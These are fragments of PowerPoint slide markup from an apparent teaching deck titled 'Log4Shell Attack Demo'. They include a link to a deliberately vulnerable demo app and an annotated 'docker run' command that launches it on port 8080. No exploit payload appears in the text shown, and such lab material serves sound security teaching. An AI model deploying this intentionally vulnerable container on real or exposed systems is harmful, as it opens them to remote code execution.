          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log4Shell Attack Demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ECB4E53-792B-F3FD-2DC6-A26225943835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/christophetd/log4shell-vulnerable-app</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="404656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8A943-8724-82F4-1ABD-6690497F20BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1499552" y="1314410"/>
            <a:ext cx="8182928" cy="2758864"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67C87EFE-F19B-2204-8E2E-82A87598BECC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1499552" y="4738329"/>
            <a:ext cx="8182928" cy="1017695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="112061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752F05-E1AB-748F-21A6-FD9C60257DEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="723750" y="182880"/>
            <a:ext cx="10744499" cy="62992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0006D81-3BE6-2249-F5F6-B820B45F8D28}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6626452" y="327852"/>
              <a:ext cx="736560" cy="603360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30006D81-3BE6-2249-F5F6-B820B45F8D28}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6590452" y="291852"/>
                <a:ext cx="808200" cy="67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947B827-B9F8-B114-E223-17A0BEBC3402}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5564452" y="3110292"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="Ink 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E947B827-B9F8-B114-E223-17A0BEBC3402}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId7"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5528452" y="3074652"/>
                <a:ext cx="72000" cy="72000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="395246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0D5B3-04DE-8F05-439B-356D921EBC80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduction to Log4Shell vulnerability &amp; attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96AAD49D-2A3D-585D-8A28-852C6CBD72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886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C90810-6726-DCF9-19E0-23B8F3DD4A0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009650" y="2478316"/>
            <a:ext cx="10172700" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--name vulnerable-app </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--rm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-p 8080:8080 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ghcr.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>christophetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/log4shell-vulnerable-app</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@sha256:..9929</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4086FC14-88CA-9455-0AB7-6BDFA9F67670}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3251200" y="1278374"/>
            <a:ext cx="1940560" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>name of the Docker container</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45EB1EFD-A979-A920-6660-B228D11DB151}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4221480" y="1924705"/>
            <a:ext cx="726440" cy="55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13D8B36-1D8F-0586-238E-F725D7279D41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5843270" y="539710"/>
            <a:ext cx="2377440" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>tells Docker to automatically remove the container when it stops running</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37B80449-40B9-923F-535C-304658685F8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7031990" y="1740039"/>
            <a:ext cx="709930" cy="83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EC439B-BE68-B8C4-6002-F61C126525F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9070340" y="678209"/>
            <a:ext cx="2532380" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maps ports between the host machine and the container</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Arrow Connector 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EADC2BD4-08F8-A7FB-FCA7-A179296F4418}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9489440" y="1739846"/>
            <a:ext cx="843280" cy="85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EE8914C-B6AA-74D4-1055-250F51835359}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009650" y="4416922"/>
            <a:ext cx="2705100" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>the container is based on an image located at the specified URL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Arrow Connector 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC73D0CB-E1A6-A4D6-6C4C-E52FE3AE88DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="23" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1341120" y="3678645"/>
            <a:ext cx="1021080" cy="73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2C8510-66A9-69BA-D7B4-35EF05241E83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4790440" y="4232256"/>
            <a:ext cx="1813560" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the container is tagged with a specific hash code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Straight Arrow Connector 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1851CA9-7BAE-471F-9886-1499CFCC721C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="27" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4145280" y="3678645"/>
            <a:ext cx="1551940" cy="55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3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AA8F5050-4CB1-3325-4AC9-AB367789563E}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2089372" y="4371372"/>
              <a:ext cx="1975680" cy="1131480"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="19" name="Ink 18">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA8F5050-4CB1-3325-4AC9-AB367789563E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2053372" y="4335732"/>
                <a:ext cx="2047320" cy="120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F1BB80A-DDD4-6CDA-444D-221FE7F19F81}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2163892" y="2540052"/>
              <a:ext cx="157680" cy="1535760"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="Ink 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F1BB80A-DDD4-6CDA-444D-221FE7F19F81}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2128252" y="2504052"/>
                <a:ext cx="229320" cy="1607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01BDFD1-5E8B-044C-50B6-7B998E9BC0EB}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2211052" y="2500812"/>
              <a:ext cx="1768680" cy="1804320"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="5" name="Ink 4">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{601BDFD1-5E8B-044C-50B6-7B998E9BC0EB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId8"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2175412" y="2465172"/>
                <a:ext cx="1840320" cy="1875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C17B6017-47A2-F030-E779-8FCBE8E1E680}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2665012" y="2961972"/>
              <a:ext cx="133560" cy="560160"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="10" name="Ink 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C17B6017-47A2-F030-E779-8FCBE8E1E680}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId10"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2629012" y="2925972"/>
                <a:ext cx="20520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8198D23-FD86-3134-3293-3F63C0B1CAF7}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2844652" y="2930652"/>
              <a:ext cx="170640" cy="570600"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="11" name="Ink 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98198D23-FD86-3134-3293-3F63C0B1CAF7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId12"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2808652" y="2894652"/>
                <a:ext cx="24228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63A81EAD-9E9C-2E06-2F60-395F1ECD8887}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2836372" y="3273732"/>
              <a:ext cx="159840" cy="55440"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="12" name="Ink 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63A81EAD-9E9C-2E06-2F60-395F1ECD8887}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId14"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2800732" y="3238092"/>
                <a:ext cx="231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BFD722A1-C698-193D-5FB0-21C31EE237CA}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3094132" y="2915172"/>
              <a:ext cx="126360" cy="550800"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="13" name="Ink 12">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFD722A1-C698-193D-5FB0-21C31EE237CA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId16"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3058492" y="2879172"/>
                <a:ext cx="19800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34B8DF8-87A5-3DF6-690E-237B26617269}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3079012" y="3131532"/>
              <a:ext cx="158040" cy="65160"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="14" name="Ink 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{034B8DF8-87A5-3DF6-690E-237B26617269}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId18"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3043372" y="3095892"/>
                <a:ext cx="229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2431A6B6-E207-4151-4359-EBEDCFE6A942}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3226972" y="2891412"/>
              <a:ext cx="126360" cy="574560"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="15" name="Ink 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2431A6B6-E207-4151-4359-EBEDCFE6A942}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId20"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
